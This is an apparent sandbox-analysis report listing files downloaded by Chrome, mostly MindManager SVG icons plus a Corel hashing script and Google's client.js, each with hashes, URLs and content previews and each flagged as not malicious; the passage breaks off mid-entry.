                                                                SHA-256:098E66AD10A8EF6509D61042D67F6D1A43C09762C441E99BF4860ABBB2C8DA7C
                                                                SHA-512:1820569D52ACD8722E53DBE16905C55D9F149C3483FF84C4A5E1A7317120EFEABEB77B75BC7828D2878A9697C3312C8A0AA38208A023EBBD2F4584AB8D5ACD05
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ipm.corel.com/static/common/scripts/hash/hash.min.js
                                                                Preview:!function(t){var s={ROTR:function(t,r){return r>>>t|r<<32-t},".0":function(t){return s.ROTR(2,t)^s.ROTR(13,t)^s.ROTR(22,t)},".1":function(t){return s.ROTR(6,t)^s.ROTR(11,t)^s.ROTR(25,t)},".0":function(t){return s.ROTR(7,t)^s.ROTR(18,t)^t>>>3},".1":function(t){return s.ROTR(17,t)^s.ROTR(19,t)^t>>>10},Ch:function(t,r,o){return t&r^~t&o},Maj:function(t,r,o){return t&r^t&o^r&o},toHexStr:function(t){for(var r="",o=7;0<=o;o--)r+=(t>>>4*o&15).toString(16);return r}};void 0===String.prototype.utf8Encode&&(String.prototype.utf8Encode=function(){return unescape(encodeURIComponent(this))}),void 0===String.prototype.utf8Decode&&(String.prototype.utf8Decode=function(){try{return decodeURIComponent(escape(this))}catch(t){return this}}),t.hash=function(t){var r=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,15
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1652
                                                                Entropy (8bit):5.063639431075365
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:85F3CFA5ED492633D48AB4C26AC37F8D
                                                                SHA1:7FFB950D01CE5C07B24CC37A236E315062A483B4
                                                                SHA-256:674281CE6397DD028FE64CA2C6A0D9AAD96B902AB4ABADFE3EFA939062BF01EB
                                                                SHA-512:5A540D7251273EFD27576C8568533D40D46783471B705AF0EF865D2534AE20693B5BB6DA8A7A3D7BC7301F034272FF692B9DF1C1083B88450F7BDCBC5642CBB0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/treemap.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="59" y="2" width="51.1901" height="12.2856" rx="6.14281" fill="#57B6C0"/>.<path d="M65.1426 20.4316V26.5745C65.1426 28.2707 66.5177 29.6459 68.214 29.6459H72.3092" stroke="#57B6C0" stroke-linecap="round"/>.<path d="M76.4062 33.7383V37.3216C76.4062 39.0179 77.7814 40.393 79.4777 40.393H97.9061" stroke="#57B6C0" stroke-linecap="round"/>.<path d="M76.4062 35.2734V45.5115C76.4062 47.2078 77.7814 48.5829 79.4777 48.5829H97.9061" stroke="#57B6C0" stroke-linecap="round"/>.<path d="M65.1426 48.0703V54.2131C65.1426 55.9094 66.5177 57.2845 68.214 57.2845H72.3092" stroke="#57B6C0" stroke-linecap="round"/>.<path d="M65.1426 61.3828V67.5256C65.1426 69.2219 66.5177 70.597 68.214 70.597H72.3092" stroke="#57B6C0" stroke-linecap="round"/>.<path d="M65.1426 13.7754V80.8344C65.1426 82.5307 66.5177 83.9058 68.214 83.9058H72.3092" stroke="#57B6C0" stroke-linecap="round"/>.<rect x="72.8105" y="25.0254"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1137
                                                                Entropy (8bit):4.592295117254927
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:462F9DCBDFA066CA1BE22918B0A5B47F
                                                                SHA1:9CD49F16645FE2EF0E63C1797C3B9F6D15BEE4FD
                                                                SHA-256:77244ACCF18BB179B44E80E14C65D2445058610BDF99B460A7EAA435A584123D
                                                                SHA-512:7F9C3F5DF024515EBCCE136732C1D4B94349063147D80FCE8B947BADFB3C3F40BE234118316F98F75E7838939B2BCADDCF20D25BEC90CDE89ED9C5D734634A6A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_alert.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#e8bf70;}.cls-2{fill:#af833b;}</style></defs><title>topic_info_icon_alert</title><path class="cls-1" d="M2.64,13.5A.76.76,0,0,1,2,13.18a13.3,13.3,0,0,1,2.36-2.82l.15-.15v-5A3.07,3.07,0,0,1,6.71,2.31l.72-.19L7,1.53A.68.68,0,0,1,7.5.43h.13a.68.68,0,0,1,.52.5A.7.7,0,0,1,8,1.53l-.45.59.72.19A3.07,3.07,0,0,1,10.5,5.26v5l.21.15A18.65,18.65,0,0,1,14,13.22a.8.8,0,0,1-.63.28Z"/><path class="cls-2" d="M7.5.93h0a.22.22,0,0,1,.12.13.17.17,0,0,1,0,.17l-.12.16-.12-.16a.17.17,0,0,1,0-.12A.18.18,0,0,1,7.5.93m0,1.68.65.19A2.54,2.54,0,0,1,10,5.26v5.25l.42.3A30,30,0,0,1,13.12,13H2.67a20.38,20.38,0,0,1,2-2.29l.3-.29V5.26A2.54,2.54,0,0,1,6.85,2.8l.65-.19m0-2.68A1.18,1.18,0,0,0,6.33,1.11a1.21,1.21,0,0,0,.25.72A3.57,3.57,0,0,0,4,5.26V10s-2.75,2.71-2.51,3.3a1.22,1.22,0,0,0,1.15.7H13.36a1.22,1.22,0,0,0,1.15-.7C14.75,12.71,11,10,11,10V5.26A3.57,3.57,0,0,0,8.42,1.83a1.21,1.21,0,0,0,.21-1A1.17,1.1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):541
                                                                Entropy (8bit):5.078427603571871
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4E45C9E8EE9BE1F91B8AC7E61BF918FC
                                                                SHA1:F52D1F23B122954394FE466DB188168CB5A6EDF1
                                                                SHA-256:35027126A02B4B55A477528EE0BC9334338F3957D1C114816ADC7DE5D78BC575
                                                                SHA-512:E076F66A60A6D1C872E19D05918F90330620F2B695F9D897BBC7E16AB525345FBF0BB0232D9250E7FF5190ED6A3064E21C327D11AF3EAFB921A6C49D19D773A3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/cellphone.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#5d5d66;}.cls-2{fill:#e6e6e6;}.cls-3{fill:#999;}.cls-4{fill:#fff;}</style></defs><title>phone_16</title><rect class="cls-1" x="3" width="10" height="16" rx="1" ry="1"/><rect class="cls-2" x="3" y="4" width="10" height="8" transform="translate(16) rotate(90)"/><rect class="cls-3" x="7.5" y="12.5" width="1" height="4" transform="translate(22.5 6.5) rotate(90)"/><rect class="cls-4" x="10" y="1" width="1" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1942
                                                                Entropy (8bit):5.1862279456591605
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6CCBEF8935DCB288583F5755636173E4
                                                                SHA1:6A7BC5EC21C37DF00C0751CA069C18E477BB0155
                                                                SHA-256:738DFB11E1BDA8687211B21FE422A9DC8F9D4C805FE178587289DEC986CE9517
                                                                SHA-512:3CCA5F9AE2A2222A7F8D8F8FA86F8646A4310AF8214B52F2C2CE399E415C1A61D641BE3DB7650BD3697124E2FF4F9BA9209BA4D4B3DEA60CFAF2A247A17CD509
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-notes-toggle-active.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18 18"><defs><style>.cls-1,.cls-3{fill:#fff;}.cls-2{fill:#3e9eff;}.cls-3{stroke:#fff;}.cls-3,.cls-7,.cls-8{stroke-miterlimit:10;}.cls-4{fill:#c8c8c8;}.cls-5{fill:#528cc9;}.cls-6{fill:gray;}.cls-7{fill:#80b6e2;stroke:#528cc9;}.cls-8{fill:#edc26e;stroke:#b4853a;}</style></defs><title>control_strip_Notes_active</title><rect class="cls-1" x="0.5" y="0.5" width="17" height="17" rx="2.44"/><path class="cls-2" d="M15.06,1A1.94,1.94,0,0,1,17,2.94V15.06A1.94,1.94,0,0,1,15.06,17H2.94A1.94,1.94,0,0,1,1,15.06V2.94A1.94,1.94,0,0,1,2.94,1H15.06m0-1H2.94A2.94,2.94,0,0,0,0,2.94V15.06A2.94,2.94,0,0,0,2.94,18H15.06A2.94,2.94,0,0,0,18,15.06V2.94A2.94,2.94,0,0,0,15.06,0Z"/><polygon class="cls-3" points="12.04 15.96 17.5 10.5 15.47 6.2 7.7 13.97 7.5 16.5 12.04 15.96"/><polygon class="cls-3" points="12.5 16.5 1.5 16.5 1.5 1.5 10 1.5 12.5 4 12.5 16.5"/><path class="cls-1" d="M12,13.42V7.36L7.79,3H4.14A1.19,1.19,0,0,0,3,4.23
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):482
                                                                Entropy (8bit):5.107772020396712
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:49AD2EAC331C672EC59563EFE95C7060
                                                                SHA1:F15C5117EAC671A2F8C4336B1B1921DF914E81F3
                                                                SHA-256:867D96B31D1745763F14552BA99327EF709E88DED1AAF406170C483D755E340E
                                                                SHA-512:829FD2DCEA51E2E80306D1157A43BAC1420DF43FFA9DC1A0C64701B0BAE60EA74DB66B33FE91297ACBA3A528DC5BC791094D5EF66FF96FF99A7FEEF5A6F96FE1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/add-place.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 22 22"><defs><style>.cls-1{fill:#92b87c;}.cls-2{fill:#629f59;}</style></defs><title>add_place</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="9.5 21.5 9.5 12.5 0.5 12.5 0.5 9.5 9.5 9.5 9.5 0.5 12.5 0.5 12.5 9.5 21.5 9.5 21.5 12.5 12.5 12.5 12.5 21.5 9.5 21.5"/><path class="cls-2" d="M12,1v9h9v2H12v9H10V12H1V10h9V1h2m1-1H9V9H0v4H9v9h4V13h9V9H13V0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2905
                                                                Entropy (8bit):3.962263100945339
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FE87496CC7A44412F7893A72099C120A
                                                                SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/yzmFPFkx8qJ6v56OXtPwGhh4YzVZp0J5y79rFrsiryycPegGVX9yhab177
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2051)
                                                                Category:downloaded
                                                                Size (bytes):15020
                                                                Entropy (8bit):5.47022616637207
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A6A8D4519364DC41B5C0EBEB97BDDB8C
                                                                SHA1:707DA388115FFED7709229BEC85F4EA738E32AB5
                                                                SHA-256:5DAD5BC3540BEF52099E0AB79A775DC8630DB7045EB7AE2E0022E2C4DBA9B150
                                                                SHA-512:8C94D859C655D8B8227DE8C709E013608C054BA1DFF3E856A8CDB2A0C2C98D4C05B9B5A01A84051DF9335BDE55F330E306817FC276346CC68F900B58E7FD57C5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://apis.google.com/js/client.js
                                                                Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):403
                                                                Entropy (8bit):5.179226539956353
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:42530DCE65C0097693C2CCE9A6AFB863
                                                                SHA1:2522BE3E1B25268B760F471767F6B1DA46AC7DCA
                                                                SHA-256:F23B39BB3925C5164E5B98E90BA5A837C0CCFA1CC61792D7DF0BF328997C7439
                                                                SHA-512:253A23DF54D6FE2C1C6CDD25F421FA244131BAE1120AF028A524CF31AFAD6E2C5E6A8350FE0BADB31D7F914BB6511EF944D44A6F3466186F5ADD45EB8BA036F1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/star4.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 18.95 18.95"><defs><style>.cls-1{fill:#fff;stroke:gray;stroke-miterlimit:10;}</style></defs><title>background_shape_Asset 74</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="11.59 7.35 17.47 9.47 11.59 11.59 9.47 17.47 7.35 11.59 1.47 9.47 7.35 7.35 9.47 1.47 11.59 7.35"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):242
                                                                Entropy (8bit):5.022043482556002
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:26E8F1947A427663058F9B93B198B2A3
                                                                SHA1:F2F1A5FCA919D7693F318556DD28743336EBC8BA
                                                                SHA-256:9AE166491FC268FAEB386CCB89B85B1453E0915EC5B14E16DDCD5348604832DA
                                                                SHA-512:01B9957D6AB259AA53569D85318187893920B337A466D0170DBE1785162388FA04199291C97A69A137A5D1E5539ED24FFA05B6A384CF024B9F2F3EBCEFA2C4C4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/marker-4.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#32d140;}</style></defs><title>heart_green_16 copy</title><polygon class="cls-1" points="0 0 8 0 16 8 8 16 0 16 0 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):925
                                                                Entropy (8bit):5.056114667807287
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:22306244DE2E5A872026EC214AEE3D7B
                                                                SHA1:6F5520268B4B7429C8F83BF44DF152F310E01146
                                                                SHA-256:B56471049A6911E7372F1D4BE54069CA24DF4DA97EE6054F3B5370A418F57F1A
                                                                SHA-512:CB924CAE00C6571AB15FE020B0D49ABB3739E7D294F3786CEF11315265BCDCBF40D629C4770C3C4814C6B54A61D86632900D0FC0F8952952C7D052CEA4C97185
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority07.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority07</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5.22,13,8.76,6a4.35,4.35,0,0,1,.3-.54,2,2,0,0,1,.22-.29L10,5.08V5a2.54,2.54,0,0,1-.65,0H5V3h7V4.7L7.78,13Z"/><path class="cls-3" d="M4.22,12,7.76,5a4.35,4.35,0,0,1,.3-.54,2,2,0,0,1,.22-.29L9,4.08V4a2.54,2.54,0,0,1-.65,0H4V2h7V3.7L6.78,12Z"/><path class="cls-4" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-3" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):874
                                                                Entropy (8bit):4.890961526056533
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B8452051A4D473C866147D965D952870
                                                                SHA1:CC485F587D2DD03C5F9AA50AF0EA26C2D670323C
                                                                SHA-256:C628A26F07C3A229A4AB7DF5786900F0139246141350F9C0EC5F7D6DE43321EC
                                                                SHA-512:67FD03BD63AD023F960D50CBD77B83C11CA9AE85783C3AA9F17041195A8B37A8BD6BA5BB483F703FD181D6BC32BD215C543210903383638ACE5A625347179A8C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/folder-icon.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 25 24"><defs><style>.cls-1{fill:#c9c9c9;}.cls-2{fill:#fff;}.cls-3{fill:gray;}</style></defs><title>filebrowserfolder</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M23.5,4H12V2.5A1.5,1.5,0,0,0,10.5,1h-8A1.5,1.5,0,0,0,1,2.5v20A1.5,1.5,0,0,0,2.5,24H14V18h4V17h4v1h3V5.5A1.5,1.5,0,0,0,23.5,4Z"/><path class="cls-2" d="M23,7H1.5A1.5,1.5,0,0,0,0,8.5v14A1.5,1.5,0,0,0,1.5,24H24l1-6V9A10.77,10.77,0,0,0,23,7Z"/><path class="cls-3" d="M23,7H2A2,2,0,0,0,0,9V22a2,2,0,0,0,2,2H14V23H2a1,1,0,0,1-1-1V9A1,1,0,0,1,2,8H23a1,1,0,0,1,1,1v9h1V9A2,2,0,0,0,23,7Z"/><path class="cls-3" d="M23,3H12V2a2,2,0,0,0-2-2H2A2,2,0,0,0,0,2V22a2,2,0,0,0,2,2H23a2,2,0,0,0,2-2V5A2,2,0,0,0,23,3Zm1,19a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V2A1,1,0,0,1,2,1h8a1,1,0,0,1,1,1V4H23a1,1,0,0,1,1,1Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1029
                                                                Entropy (8bit):4.702787186220036
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7C02E5151D2D6904E2324B06517AE27A
                                                                SHA1:7DDE1607F587655571161A5058CC6AABC9E41FA3
                                                                SHA-256:1F30ED4BC907DA850674F63C8CEAC9D88712287CAFAC4C1D193F8DA3FE3590A9
                                                                SHA-512:8B465EC51ECEAD0CD4F2ED088831EB8EC33D0D1BD41737AA4BE101C6799B3095261A6623590FCF20CBC3530236BD2CE8B2841D9A3EB711C9246088390AA17813
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_linkmulti.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#528cc9;}.cls-2{fill:gray;}</style></defs><title>topic_info_icon_linkmulti</title><path class="cls-1" d="M4.56,6A7.72,7.72,0,0,1,5.8,5.38a3.51,3.51,0,0,1,3.75.9A.9.9,0,0,1,8.79,7.8a1.31,1.31,0,0,1-.58-.28,1.87,1.87,0,0,0-2.62.07c-.85.85-1.7,1.69-2.54,2.55a1.84,1.84,0,1,0,2.61,2.6l1.2-1.2a.93.93,0,0,1,1.23-.18.91.91,0,0,1,.24,1.26s-1.71,1.71-1.75,1.74a3.6,3.6,0,0,1-3.75.48,9,9,0,0,1-.89-.52l-.47-.47a.83.83,0,0,0-.07-.13,3.59,3.59,0,0,1-.35-3.91c.13-.26.31-.49.46-.73Z"/><path class="cls-1" d="M11.26,9.73a7.72,7.72,0,0,1-1.24.65,3.51,3.51,0,0,1-3.75-.89A.91.91,0,0,1,7,8a1.31,1.31,0,0,1,.58.28,1.86,1.86,0,0,0,2.62-.07l2.55-2.54A1.85,1.85,0,1,0,10.16,3L9,4.22A.91.91,0,0,1,7.49,3.14a.11.11,0,0,1,0-.05L9.11,1.48l.13-.07A3.58,3.58,0,0,1,13,.93a7.86,7.86,0,0,1,.89.51l.47.47a.83.83,0,0,0,.07.13A3.6,3.6,0,0,1,14.77,6c-.13.26-.31.49-.46.73Z"/><polygon class="cls-2" points="16 13 13
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):869
                                                                Entropy (8bit):5.1017812367009325
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1C52F4F96EC53F6A5E22CDD613EF3A59
                                                                SHA1:5230FD09D7598338D820C4B3AF3F538AC2452835
                                                                SHA-256:225F695F32B751B987A27F40EBB403BEDBD3B49CD58B3A2E9F7BF2DF810F2CA5
                                                                SHA-512:2364C5EBA9A7B4757599AFE9F066E23BA8AF624746104DCF8ED6F83F795CE14B0003C7C907C6322D1BAB346205E8202FD61359548E17DB488F27AC37DFAF42B2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority01.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#e10001;}.cls-2{fill:#9e0008;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority01</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M6,13V11H8V6.73L8.25,6h0a2.6,2.6,0,0,1-.39.49L7.22,7,5.81,5.52,8.51,3H10v8h2v2Z"/><path class="cls-3" d="M5,12V10H7V5.73L7.25,5h0a2.6,2.6,0,0,1-.39.49L6.22,6,4.81,4.52,7.51,2H9v8h2v2Z"/><path class="cls-4" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-3" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):286
                                                                Entropy (8bit):5.05993921042163
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4EF9E9626059D56A2DB9C8F197188053
                                                                SHA1:18CD28CAEA3CBE8F0E87AFF6E27E2187884AB0D3
                                                                SHA-256:D45B055843D7C5841EB16F8339E7D97F6D1D504D6262CEED6E020BC0F3DE3D3A
                                                                SHA-512:82B615C3886F74D51977F3AF038941091E156505C8DF3405068EAA692A3C690DB2C69534B546DCE4A68EE290CE7E82AF21931D1620F17F3CEA9E48B336C9299A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/arrow-down.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}</style></defs><title>thickarrow_down_red_16</title><rect class="cls-1" x="4" width="8" height="11"/><polygon class="cls-1" points="8 16 0 8 16 8 8 16"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):867
                                                                Entropy (8bit):4.887719697158884
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:38C8B9EC2F7FBDEB274C7E0ADADE2760
                                                                SHA1:CDC1AB651966396A136ACD6638F5B4F66231A461
                                                                SHA-256:2C2C351C0D04C36703B4DCECF7098B1154CE5FFF3D4436D6885D0B2B32DC91CF
                                                                SHA-512:0549798A9707A39D21B10D8D76AE151212BE03687C26082BD91F85FDF074392F056EFBE343EFB19BF4CA198FF2A5D3C0CED455105471F405C9AAEF30DF522E91
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/dollar.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#32d140;}.cls-2{fill:#fff;}</style></defs><title>dollar_16</title><rect class="cls-1" width="16" height="16" rx="2" ry="2"/><circle class="cls-2" cx="8" cy="8" r="7"/><path class="cls-1" d="M11.22,9.32a2,2,0,0,1-.71,1.57A3.58,3.58,0,0,1,9,11.6V13H8V11.76a8.55,8.55,0,0,1-3-.53V9.61a9.12,9.12,0,0,0,1.47.47A9.94,9.94,0,0,0,8,10.32v-2l-.73-.16a4.54,4.54,0,0,1-1.72-1A2,2,0,0,1,5,5.68a1.81,1.81,0,0,1,.7-1.47A3.85,3.85,0,0,1,8,3.51V3H9v.49a7.22,7.22,0,0,1,2.08.57L10.5,5.49A13.91,13.91,0,0,0,9,5V6.83a10,10,0,0,0,1.24.8,2.36,2.36,0,0,1,.74.74A1.84,1.84,0,0,1,11.22,9.32Zm-4-3.64a.61.61,0,0,0,.18.45A2.78,2.78,0,0,0,8,6.49V5C7.47,5.12,7.21,5.33,7.21,5.68ZM8.84,9.41A.54.54,0,0,0,8.63,9,2.48,2.48,0,0,0,8,8.61v1.53C8.56,10.05,8.84,9.8,8.84,9.41Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1307
                                                                Entropy (8bit):4.233476862552086
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:70001E0043EBB62441171CF2C0BEF544
                                                                SHA1:AD4C87E89D85720D85AE406E82792BE665F4BAA7
